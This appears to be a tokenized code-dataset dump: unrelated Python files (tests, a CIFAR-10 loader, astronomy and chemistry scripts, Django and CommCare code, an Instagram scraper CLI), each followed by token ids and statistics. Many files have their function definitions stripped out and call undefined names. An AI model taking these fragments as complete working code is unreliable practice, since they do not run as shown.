[ 37811, 198, 220, 1374, 284, 900, 510, 7166, 2858, 198, 220, 220, 220, 7347, 2721, 7166, 24330, 198, 220, 220, 220, 7347, 2721, 7166, 24330, 48553, 628, 220, 1303, 10784, 30936, 1340, 62, 39069, 31820, 14, 4834, 14259, 198, 220, 2723, ...
3.212963
216
from SemiBin.main import generate_data_single import os import pytest import logging import pandas as pd
[ 6738, 35525, 33, 259, 13, 12417, 1330, 7716, 62, 7890, 62, 29762, 198, 11748, 28686, 198, 11748, 12972, 9288, 198, 11748, 18931, 198, 11748, 19798, 292, 355, 279, 67 ]
3.586207
29
# Copyright 2020 - The Android Open Source Project # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for create.""" import unittest from unittest import mock from acloud import errors from acloud.create import create_args from acloud.internal import constants from acloud.internal.lib import driver_test_lib def _CreateArgs(): """set default pass in arguments.""" mock_args = mock.MagicMock( flavor=None, num=1, adb_port=None, hw_property=None, stable_cheeps_host_image_name=None, stable_cheeps_host_image_project=None, username=None, password=None, cheeps_betty_image=None, local_image=None, local_kernel_image=None, local_system_image=None, system_branch=None, system_build_id=None, system_build_target=None, local_instance=None, remote_host=None, host_user=constants.GCE_USER, host_ssh_private_key_path=None, avd_type=constants.TYPE_CF, autoconnect=constants.INS_KEY_VNC) return mock_args # pylint: disable=invalid-name,protected-access if __name__ == "__main__": unittest.main()
[ 2, 15069, 12131, 532, 383, 5565, 4946, 8090, 4935, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, ...
2.65142
634
#!/usr/bin/env python # -*- coding: utf-8 -*- import sys from cx_Freeze import setup,Executable icondata='icon.ico' base = None # GUI=, CUI= if sys.platform == 'win32' : base = 'win32GUI' exe = Executable(script = 'main.py', base = base, #icon=icondata ) setup(name = 'MSman', version = '0.1', description = 'Minecraft Server Manager', executables = [exe] )
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 25064, 198, 6738, 43213, 62, 11146, 2736, 1330, 9058, 11, 23002, 18187, 198, 198, 291, 623, 1045, 11639, 47...
2.079439
214
from __future__ import annotations from threading import Lock from typing import List, Set, Optional, Any, Tuple from stereotype.utils import ConfigurationError _roles: List[Role] = [] _roles_lock = Lock() DEFAULT_ROLE = Role('default')
[ 6738, 11593, 37443, 834, 1330, 37647, 198, 198, 6738, 4704, 278, 1330, 13656, 198, 6738, 19720, 1330, 7343, 11, 5345, 11, 32233, 11, 4377, 11, 309, 29291, 198, 198, 6738, 31240, 13, 26791, 1330, 28373, 12331, 628, 198, 198, 62, 305, 8...
3.402778
72
# coding:utf-8 ''' VSWR 10marker ''' import os import logging from commoninterface.zvlbase import ZVLBase logger = logging.getLogger('ghost')
[ 2, 19617, 25, 40477, 12, 23, 198, 7061, 6, 198, 53, 17887, 49, 198, 940, 4102, 263, 198, 7061, 6, 198, 11748, 28686, 198, 11748, 18931, 198, 6738, 2219, 39994, 13, 89, 19279, 8692, 1330, 1168, 47468, 14881, 198, 198, 6404, 1362, 796...
2.769231
52
from __future__ import division import numpy as np import matplotlib.pyplot as plt import shellmodelutilities as smutil # Set bin width and range bin_width = 0.20 Emax = 14 Nbins = int(np.ceil(Emax/bin_width)) Emax_adjusted = bin_width*Nbins # Trick to get an integer number of bins bins = np.linspace(0,Emax_adjusted,Nbins+1) # Define list of calculation input files and corresponding label names inputfile = "summary_Zn70_jun45.txt" # Instantiate figure which we will fill f_rho, ax_rho = plt.subplots(1,1) # Read energy levels from file levels = smutil.read_energy_levels(inputfile) # Choose which [2*J,pi] combinations to include in partial level density plot Jpi_list = [[0,-1],[2,-1],[4,-1],[6,-1],[8,-1],[10,-1],[12,-1],[14,-1],[16,-1],[18,-1],[20,-1],[22,-1],[24,-1],[26,-1],[28,-1], [0,+1],[2,+1],[4,+1],[6,+1],[8,+1],[10,+1],[12,+1],[14,+1],[16,+1],[18,+1],[20,+1],[22,+1],[24,+1],[26,+1],[28,+1]] # Allocate (Ex,Jpi) matrix to store partial level density rho_ExJpi = np.zeros((Nbins,len(Jpi_list))) # Count number of levels for each (Ex, J, pi) pixel. 
Egs = levels[0,0] # Ground state energy for i_l in range(len(levels[:,0])): E, J, pi = levels[i_l] # Skip if level is outside range: if E-Egs >= Emax: continue i_Ex = int(np.floor((E-Egs)/bin_width)) try: i_Jpi = Jpi_list.index([J,pi]) except: continue rho_ExJpi[i_Ex,i_Jpi] += 1 rho_ExJpi /= bin_width # Normalize to bin width, to get density in MeV^-1 # Plot it from matplotlib.colors import LogNorm # To get log scaling on the z axis colorbar_object = ax_rho.pcolormesh(np.linspace(0,len(Jpi_list)-1,len(Jpi_list)), bins, rho_ExJpi, norm=LogNorm()) f_rho.colorbar(colorbar_object) # Add colorbar to plot # Make the plot nice ax_rho.set_xlabel(r"$\pi\cdot J\,\mathrm{(\hbar)}$") ax_rho.set_ylabel(r'$E_x \, \mathrm{(MeV)}$') # A bit of Python voodoo to get the x labels right: Jpi_array = np.append(np.linspace(0,-int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2)),np.linspace(0,int((len(Jpi_list)-1)/2),int(len(Jpi_list)/2))) # Array of pi*J for plot ax_rho.set_xlim([0,29]) ax_rho.xaxis.set_major_formatter(plt.FuncFormatter(format_func)) ax_rho.set_xticks([0,2,4,6,8,10,12,14,15,17,19,21,23,25,27]) # Show plot plt.show()
[ 6738, 11593, 37443, 834, 1330, 7297, 198, 11748, 299, 32152, 355, 45941, 220, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 220, 198, 11748, 7582, 19849, 315, 2410, 355, 895, 22602, 628, 198, 198, 2, 5345, 9874, 9647, ...
2.279678
994
import abc import secrets from collections.abc import AsyncIterator, Awaitable, Callable, Mapping from contextlib import AbstractAsyncContextManager, asynccontextmanager from dataclasses import dataclass from datetime import datetime, timezone import pytest from aiohttp import ClientSession from yarl import URL from platform_buckets_api.providers import ( BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations, ) from platform_buckets_api.storage import ImportedBucket, ProviderBucket BUCKET_NAME_PREFIX = "integration-tests-" ROLE_NAME_PREFIX = "integration-tests-" def as_admin_cm( creator_func: Callable[[ProviderBucket], BasicBucketClient] ) -> Callable[[ProviderBucket], AbstractAsyncContextManager[BasicBucketClient]]: return creator # Access checkers class TestProviderBase: __test__ = False
[ 11748, 450, 66, 198, 11748, 13141, 198, 6738, 17268, 13, 39305, 1330, 1081, 13361, 37787, 11, 5851, 4548, 540, 11, 4889, 540, 11, 337, 5912, 198, 6738, 4732, 8019, 1330, 27741, 42367, 21947, 13511, 11, 355, 2047, 535, 261, 5239, 37153, ...
3.214789
284
# Licensed under a 3-clause BSD style license - see LICENSE.rst """ sbpy bandpass Module """ __all__ = [ 'bandpass' ] import os from astropy.utils.data import get_pkg_data_filename def bandpass(name): """Retrieve bandpass transmission spectrum from sbpy. Parameters ---------- name : string Name of the bandpass, case insensitive. See notes for available filters. Returns ------- bp : `~synphot.SpectralElement` Notes ----- Available filters: +-------------+---------------------------+ | Name | Source | +=============+===========================+ | 2MASS J | Cohen et al. 2003 | +-------------+---------------------------+ | 2MASS H | Cohen et al. 2003 | +-------------+---------------------------+ | 2MASS Ks | Cohen et al. 2003 | +-------------+---------------------------+ | Cousins R | STScI CDBS, v4 | +-------------+---------------------------+ | Cousins I | STScI CDBS, v4 | +-------------+---------------------------+ | Johnson U | STScI CDBS, v4 | +-------------+---------------------------+ | Johnson B | STScI CDBS, v4 | +-------------+---------------------------+ | Johnson V | STScI CDBS, v4 | +-------------+---------------------------+ | PS1 g | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 r | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 i | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 w | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 y | Tonry et al. 2012 | +-------------+---------------------------+ | PS1 z | Tonry et al. 
2012 | +-------------+---------------------------+ | SDSS u | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS g | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS r | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS i | SDSS, dated 2001 | +-------------+---------------------------+ | SDSS z | SDSS, dated 2001 | +-------------+---------------------------+ | WFC3 F438W | HST/WFC3 UVIS, v4 | +-------------+---------------------------+ | WFC3 F606W | HST/WFC3 UVIS, v4 | +-------------+---------------------------+ | WISE W1 | Jarrett et al. 2011 | +-------------+---------------------------+ | WISE W2 | Jarrett et al. 2011 | +-------------+---------------------------+ | WISE W3 | Jarrett et al. 2011 | +-------------+---------------------------+ | WISE W4 | Jarrett et al. 2011 | +-------------+---------------------------+ References ---------- .. [CDBS] Space Telescope Science Institute. HST Calibration Reference Data System. https://hst-crds.stsci.edu/ . .. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ 126, 1090. .. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of the Ecliptic Poles. ApJ 735, 112. .. [SDSS] Sloan Digital Sky Survey. Camera. www.sdss.org/instruments/camera . .. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric System. ApJ 750, 99. 
""" try: import synphot except ImportError: raise ImportError('synphot is required.') name2file = { '2mass j': '2mass-j-rsr.txt', '2mass h': '2mass-h-rsr.txt', '2mass ks': '2mass-ks-rsr.txt', 'cousins r': 'cousins_r_004_syn.fits', 'cousins i': 'cousins_i_004_syn.fits', 'johnson u': 'johnson_u_004_syn.fits', 'johnson b': 'johnson_b_004_syn.fits', 'johnson v': 'johnson_v_004_syn.fits', 'ps1 g': 'ps1-gp1.txt', 'ps1 r': 'ps1-rp1.txt', 'ps1 i': 'ps1-ip1.txt', 'ps1 w': 'ps1-wp1.txt', 'ps1 y': 'ps1-yp1.txt', 'ps1 z': 'ps1-zp1.txt', 'sdss u': 'sdss-u.fits', 'sdss g': 'sdss-g.fits', 'sdss r': 'sdss-r.fits', 'sdss i': 'sdss-i.fits', 'sdss z': 'sdss-z.fits', 'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits', 'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits', 'wise w1': 'WISE-RSR-W1.EE.txt', 'wise w2': 'WISE-RSR-W2.EE.txt', 'wise w3': 'WISE-RSR-W3.EE.txt', 'wise w4': 'WISE-RSR-W4.EE.txt', } fn = get_pkg_data_filename(os.path.join( '..', 'photometry', 'data', name2file[name.lower()])) bp = synphot.SpectralElement.from_file(fn) return bp
[ 2, 49962, 739, 257, 513, 12, 565, 682, 347, 10305, 3918, 5964, 532, 766, 38559, 24290, 13, 81, 301, 198, 37811, 198, 36299, 9078, 4097, 6603, 19937, 198, 198, 37811, 198, 198, 834, 439, 834, 796, 685, 198, 220, 220, 220, 705, 3903, ...
2.21076
2,249
from django.http import HttpResponse from django.shortcuts import render, redirect from community.models import Community # Create your views here.
[ 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 31077, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 8543, 11, 18941, 198, 6738, 2055, 13, 27530, 1330, 8108, 628, 198, 2, 13610, 534, 5009, 994, 13, 628, 628 ]
4.135135
37
# Generated by Django 3.1.2 on 2020-10-18 17:19 from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 16, 13, 17, 319, 12131, 12, 940, 12, 1507, 1596, 25, 1129, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
# OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device # Copyright (c) 2017 QuTech (Delft) # Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__ # # Pieter Eendebak <pieter.eendebak@tno.nl>, 2017 # Takafumi Fujita <t.fujita@tudelft.nl>, 2016 # Guenevere Prawiroatmodjo <guen@vvtp.tudelft.nl>, 2009 # Pieter de Groot <pieterdegroot@gmail.com>, 2009 from time import sleep import visa import logging from qcodes import VisaInstrument
[ 2, 13643, 818, 2536, 2886, 62, 4146, 44, 2167, 13, 9078, 1398, 11, 284, 1620, 262, 6946, 1022, 262, 27323, 2848, 290, 262, 3335, 198, 2, 15069, 357, 66, 8, 2177, 2264, 17760, 357, 13856, 701, 8, 198, 2, 6127, 318, 1695, 739, 262, ...
2.983516
182
import numpy as np import matplotlib.pyplot as plt import pickle """ The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000 training images and 10000 test images. The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random order, but some training batches may contain more images from one class than another. Between them, the training batches contain exactly 5000 images from each class. """ def unpickle(file): """load the cifar-10 data""" with open(file, 'rb') as fo: data = pickle.load(fo, encoding='bytes') return data def load_cifar_10_data(data_dir, negatives=False): """ Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels """ # get the meta_data_dict # num_cases_per_batch: 1000 # label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck'] # num_vis: :3072 meta_data_dict = unpickle(data_dir + "/batches.meta") cifar_label_names = meta_data_dict[b'label_names'] cifar_label_names = np.array(cifar_label_names) # training data cifar_train_data = None cifar_train_filenames = [] cifar_train_labels = [] # cifar_train_data_dict # 'batch_label': 'training batch 5 of 5' # 'data': ndarray # 'filenames': list # 'labels': list for i in range(1, 6): cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i)) if i == 1: cifar_train_data = cifar_train_data_dict[b'data'] else: cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data'])) cifar_train_filenames += cifar_train_data_dict[b'filenames'] cifar_train_labels += cifar_train_data_dict[b'labels'] cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32)) if negatives: cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32) else: cifar_train_data 
= np.rollaxis(cifar_train_data, 1, 4) cifar_train_filenames = np.array(cifar_train_filenames) cifar_train_labels = np.array(cifar_train_labels) # test data # cifar_test_data_dict # 'batch_label': 'testing batch 1 of 1' # 'data': ndarray # 'filenames': list # 'labels': list cifar_test_data_dict = unpickle(data_dir + "/test_batch") cifar_test_data = cifar_test_data_dict[b'data'] cifar_test_filenames = cifar_test_data_dict[b'filenames'] cifar_test_labels = cifar_test_data_dict[b'labels'] cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32)) if negatives: cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32) else: cifar_test_data = np.rollaxis(cifar_test_data, 1, 4) cifar_test_filenames = np.array(cifar_test_filenames) cifar_test_labels = np.array(cifar_test_labels) return cifar_train_data, cifar_train_filenames, cifar_train_labels, \ cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names if __name__ == "__main__": """show it works""" cifar_10_dir = '.\cifar10-dataset' train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \ load_cifar_10_data(cifar_10_dir) print("Train data: ", train_data.shape) print("Train filenames: ", train_filenames.shape) print("Train labels: ", train_labels.shape) print("Test data: ", test_data.shape) print("Test filenames: ", test_filenames.shape) print("Test labels: ", test_labels.shape) print("Label names: ", label_names.shape) # Don't forget that the label_names and filesnames are in binary and need conversion if used. # display some random training images in a 25x25 grid num_plot = 5 f, ax = plt.subplots(num_plot, num_plot) for m in range(num_plot): for n in range(num_plot): idx = np.random.randint(0, train_data.shape[0]) ax[m, n].imshow(train_data[idx]) ax[m, n].get_xaxis().set_visible(False) ax[m, n].get_yaxis().set_visible(False) f.subplots_adjust(hspace=0.1) f.subplots_adjust(wspace=0) plt.show()
[ 11748, 299, 32152, 355, 45941, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 2298, 293, 198, 198, 37811, 198, 464, 327, 5064, 1503, 12, 940, 27039, 10874, 286, 718, 2388, 3933, 87, 2624, 9568, 4263, 287, 83...
2.353223
1,877
# This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0 # which is available at https://www.volatilityfoundation.org/license/vsl-v1.0 # """A module containing a collection of plugins that produce data typically found in Mac's lsmod command.""" from volatility3.framework import renderers, interfaces, contexts from volatility3.framework.configuration import requirements from volatility3.framework.interfaces import plugins from volatility3.framework.objects import utility from volatility3.framework.renderers import format_hints
[ 2, 770, 2393, 318, 15069, 13130, 4709, 18486, 5693, 290, 11971, 739, 262, 4709, 18486, 10442, 13789, 352, 13, 15, 198, 2, 543, 318, 1695, 379, 3740, 1378, 2503, 13, 10396, 18486, 42526, 13, 2398, 14, 43085, 14, 85, 6649, 12, 85, 16,...
4.484615
130
''' instahunter.py Author: Araekiel Copyright: Copyright 2019, Araekiel License: MIT Version: 1.6.3 ''' import click import requests import json from datetime import datetime headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0"} cli.add_command(getposts) cli.add_command(getuser) cli.add_command(getuserposts) cli.add_command(search) if __name__ == "__main__": cli()
[ 7061, 6, 198, 220, 220, 220, 916, 993, 403, 353, 13, 9078, 628, 220, 220, 220, 6434, 25, 30574, 988, 8207, 198, 220, 220, 220, 15069, 25, 220, 15069, 220, 13130, 11, 30574, 988, 8207, 198, 220, 220, 220, 13789, 25, 17168, 198, 220...
2.5
184
#!/usr/bin/env python # Copyright 2014-2019 The PySCF Developers. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Author: Qiming Sun <osirpt.sun@gmail.com> # ''' Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling (In testing) Refs: J. Phys. Chem. A. 114, 9246, 2010 Mole. Phys. 9, 6, 585, 1964 ''' from functools import reduce import numpy, sys from pyscf import lib from pyscf.lib import logger from pyscf.dft import numint from pyscf.prop.nmr import uks as uks_nmr from pyscf.prop.esr import uhf as uhf_esr from pyscf.prop.esr.uhf import _write, align from pyscf.data import nist from pyscf.grad import rks as rks_grad # Note mo10 is the imaginary part of MO^1 # Treat Vxc as one-particle operator Vnuc # Jia, start to work here if __name__ == '__main__': from pyscf import gto, scf mol = gto.M(atom='H 0 0.1 0; H 0 0 1.', basis='ccpvdz', spin=1, charge=-1, verbose=3) mf = scf.UKS(mol).set(xc='bp86').run() esr_obj = ESR(mf) esr_obj.gauge_orig = (0,0,0) esr_obj.para_soc2e = False esr_obj.so_eff_charge = True print(esr_obj.kernel()) mol = gto.M(atom=''' H 0 0 1 H 1.2 0 1 H .1 1.1 0.3 H .8 .7 .6 ''', basis='ccpvdz', spin=1, charge=1, verbose=3) mf = scf.UKS(mol).set(xc='bp86').run() gobj = GTensor(mf) #print(gobj.kernel()) gobj.para_soc2e = 'SSO' gobj.dia_soc2e = None gobj.so_eff_charge = False nao, nmo = mf.mo_coeff[0].shape nelec = mol.nelec numpy.random.seed(1) mo10 =[numpy.random.random((3,nmo,nelec[0])), numpy.random.random((3,nmo,nelec[1]))] 
print(lib.finger(para(gobj, mo10, mf.mo_coeff, mf.mo_occ)) - -2.1813250579863279e-05) numpy.random.seed(1) dm0 = numpy.random.random((2,nao,nao)) dm0 = dm0 + dm0.transpose(0,2,1) dm10 = numpy.random.random((2,3,nao,nao)) dm10 = dm10 - dm10.transpose(0,1,3,2) print(lib.finger(make_para_soc2e(gobj, dm0, dm10)) - 0.0036073897889263721)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 15069, 1946, 12, 23344, 383, 9485, 6173, 37, 34152, 13, 1439, 6923, 33876, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341,...
2.184343
1,188
import random import magent from magent.builtin.rule_model import RandomActor import numpy as np if __name__ == "__main__": gw = magent.gridworld cfg = gw.Config() map_size = 25 cfg.set({"map_width": map_size, "map_height": map_size}) agent_group = cfg.add_group( cfg.register_agent_type( name="agent", attr={ 'width': 1, 'length': 1, 'view_range': gw.CircleRange(4), 'can_gather': True})) food_group = cfg.add_group( cfg.register_agent_type( "food", attr={'width': 1, 'length': 1, 'can_be_gathered': True})) # add reward rule a = gw.AgentSymbol(agent_group, index='any') b = gw.AgentSymbol(food_group, index='any') e = gw.Event(a, 'collide', b) cfg.add_reward_rule(e, receiver=a, value=1) # cfg.add_reward_rule(e2, receiver=b, value=1, die=True) # cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1]) env = magent.GridWorld(cfg) agent_handle, food_handle = env.get_handles() model1 = RandomActor(env, agent_handle, "up") env.set_render_dir("build/render") env.reset() upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2), (map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2), (map_size//2 + 2, map_size//2 + 2)] # spawnrate = 0.1 env.add_agents(agent_handle, method="custom", pos=upstart) # env.add_agents(rightgroup, method="custom", pos=rightstart) init_food(env, food_handle) k = env.get_observation(agent_handle) print env.get_pos(agent_handle) print len(env.get_pos(food_handle)) done = False step_ct = 0 r_sum = 0 while not done: obs_1 = env.get_observation(agent_handle) ids_1 = env.get_agent_id(agent_handle) acts_1 = model1.infer_action(obs_1, ids_1) env.set_action(agent_handle, acts_1) # simulate one step done = env.step() # render env.render() # get reward reward = sum(env.get_reward(agent_handle)) r_sum += reward # clear dead agents env.clear_dead() neigbor_regen_food(env, food_handle) # print info # if step_ct % 10 == 0: # print("step %d" % step_ct) step_ct += 1 if step_ct > 250: break print r_sum
[ 11748, 4738, 198, 11748, 2153, 298, 198, 6738, 2153, 298, 13, 18780, 259, 13, 25135, 62, 19849, 1330, 14534, 40277, 198, 11748, 299, 32152, 355, 45941, 628, 198, 198, 361, 11593, 3672, 834, 6624, 366, 834, 12417, 834, 1298, 198, 220, ...
2.023102
1,212
import itertools import logging from datetime import date from django.apps import apps from django.conf import settings from django.db import connection, transaction from django.db.models import Q from dimagi.utils.chunked import chunked from corehq.apps.accounting.models import Subscription from corehq.apps.accounting.utils import get_change_status from corehq.apps.custom_data_fields.dbaccessors import get_by_domain_and_type from corehq.apps.domain.utils import silence_during_tests from corehq.apps.locations.views import LocationFieldsView from corehq.apps.products.views import ProductFieldsView from corehq.apps.userreports.dbaccessors import ( delete_all_ucr_tables_for_domain, ) from corehq.apps.users.views.mobile import UserFieldsView from corehq.blobs import CODES, get_blob_db from corehq.blobs.models import BlobMeta from corehq.form_processor.backends.sql.dbaccessors import doc_type_to_state from corehq.form_processor.interfaces.dbaccessors import ( CaseAccessors, FormAccessors, ) from corehq.util.log import with_progress_bar logger = logging.getLogger(__name__) def _delete_domain_backend_mappings(domain_name): model = apps.get_model('sms', 'SQLMobileBackendMapping') model.objects.filter(is_global=False, domain=domain_name).delete() def _delete_domain_backends(domain_name): model = apps.get_model('sms', 'SQLMobileBackend') model.objects.filter(is_global=False, domain=domain_name).delete() def _delete_web_user_membership(domain_name): from corehq.apps.users.models import WebUser active_web_users = WebUser.by_domain(domain_name) inactive_web_users = WebUser.by_domain(domain_name, is_active=False) for web_user in list(active_web_users) + list(inactive_web_users): web_user.delete_domain_membership(domain_name) if settings.UNIT_TESTING and not web_user.domain_memberships: web_user.delete() else: web_user.save() # We use raw queries instead of ORM because Django queryset delete needs to # fetch objects into memory to send signals and handle cascades. 
It makes deletion very slow # if we have a millions of rows in stock data tables. DOMAIN_DELETE_OPERATIONS = [ RawDeletion('stock', """ DELETE FROM stock_stocktransaction WHERE report_id IN (SELECT id FROM stock_stockreport WHERE domain=%s) """), RawDeletion('stock', "DELETE FROM stock_stockreport WHERE domain=%s"), RawDeletion('stock', """ DELETE FROM commtrack_stockstate WHERE product_id IN (SELECT product_id FROM products_sqlproduct WHERE domain=%s) """), ModelDeletion('products', 'SQLProduct', 'domain'), ModelDeletion('locations', 'SQLLocation', 'domain'), ModelDeletion('locations', 'LocationType', 'domain'), ModelDeletion('stock', 'DocDomainMapping', 'domain_name'), ModelDeletion('domain_migration_flags', 'DomainMigrationProgress', 'domain'), ModelDeletion('sms', 'DailyOutboundSMSLimitReached', 'domain'), ModelDeletion('sms', 'SMS', 'domain'), ModelDeletion('sms', 'SQLLastReadMessage', 'domain'), ModelDeletion('sms', 'ExpectedCallback', 'domain'), ModelDeletion('ivr', 'Call', 'domain'), ModelDeletion('sms', 'Keyword', 'domain'), ModelDeletion('sms', 'PhoneNumber', 'domain'), ModelDeletion('sms', 'MessagingSubEvent', 'parent__domain'), ModelDeletion('sms', 'MessagingEvent', 'domain'), ModelDeletion('sms', 'QueuedSMS', 'domain'), ModelDeletion('sms', 'SelfRegistrationInvitation', 'domain'), CustomDeletion('sms', _delete_domain_backend_mappings), ModelDeletion('sms', 'MobileBackendInvitation', 'domain'), CustomDeletion('sms', _delete_domain_backends), CustomDeletion('users', _delete_web_user_membership), CustomDeletion('accounting', _terminate_subscriptions), CustomDeletion('form_processor', _delete_all_cases), CustomDeletion('form_processor', _delete_all_forms), ModelDeletion('aggregate_ucrs', 'AggregateTableDefinition', 'domain'), ModelDeletion('app_manager', 'AppReleaseByLocation', 'domain'), ModelDeletion('app_manager', 'LatestEnabledBuildProfiles', 'domain'), ModelDeletion('app_manager', 'ResourceOverride', 'domain'), ModelDeletion('app_manager', 
'GlobalAppConfig', 'domain'), ModelDeletion('case_importer', 'CaseUploadRecord', 'domain'), ModelDeletion('case_search', 'CaseSearchConfig', 'domain'), ModelDeletion('case_search', 'CaseSearchQueryAddition', 'domain'), ModelDeletion('case_search', 'FuzzyProperties', 'domain'), ModelDeletion('case_search', 'IgnorePatterns', 'domain'), ModelDeletion('cloudcare', 'ApplicationAccess', 'domain'), ModelDeletion('consumption', 'DefaultConsumption', 'domain'), ModelDeletion('data_analytics', 'GIRRow', 'domain_name'), ModelDeletion('data_analytics', 'MALTRow', 'domain_name'), ModelDeletion('data_dictionary', 'CaseType', 'domain'), ModelDeletion('data_interfaces', 'CaseRuleAction', 'rule__domain'), ModelDeletion('data_interfaces', 'CaseRuleCriteria', 'rule__domain'), ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'rule__domain'), ModelDeletion('data_interfaces', 'CaseRuleSubmission', 'domain'), # TODO ModelDeletion('data_interfaces', 'AutomaticUpdateRule', 'domain'), ModelDeletion('data_interfaces', 'DomainCaseRuleRun', 'domain'), ModelDeletion('domain', 'TransferDomainRequest', 'domain'), ModelDeletion('export', 'EmailExportWhenDoneRequest', 'domain'), CustomDeletion('export', _delete_data_files), ModelDeletion('locations', 'LocationFixtureConfiguration', 'domain'), ModelDeletion('ota', 'MobileRecoveryMeasure', 'domain'), ModelDeletion('ota', 'SerialIdBucket', 'domain'), ModelDeletion('phone', 'OwnershipCleanlinessFlag', 'domain'), ModelDeletion('phone', 'SyncLogSQL', 'domain'), ModelDeletion('registration', 'RegistrationRequest', 'domain'), ModelDeletion('reminders', 'EmailUsage', 'domain'), ModelDeletion('reports', 'ReportsSidebarOrdering', 'domain'), ModelDeletion('smsforms', 'SQLXFormsSession', 'domain'), ModelDeletion('translations', 'SMSTranslations', 'domain'), ModelDeletion('translations', 'TransifexBlacklist', 'domain'), ModelDeletion('userreports', 'AsyncIndicator', 'domain'), ModelDeletion('users', 'DomainRequest', 'domain'), ModelDeletion('users', 
'Invitation', 'domain'), ModelDeletion('users', 'DomainPermissionsMirror', 'source'), ModelDeletion('zapier', 'ZapierSubscription', 'domain'), ModelDeletion('dhis2', 'Dhis2Connection', 'domain'), ModelDeletion('motech', 'RequestLog', 'domain'), ModelDeletion('couchforms', 'UnfinishedSubmissionStub', 'domain'), CustomDeletion('custom_data_fields', _delete_custom_data_fields), CustomDeletion('ucr', delete_all_ucr_tables_for_domain), ]
[ 11748, 340, 861, 10141, 198, 11748, 18931, 198, 6738, 4818, 8079, 1330, 3128, 198, 198, 6738, 42625, 14208, 13, 18211, 1330, 6725, 198, 6738, 42625, 14208, 13, 10414, 1330, 6460, 198, 6738, 42625, 14208, 13, 9945, 1330, 4637, 11, 8611, ...
2.894247
2,364
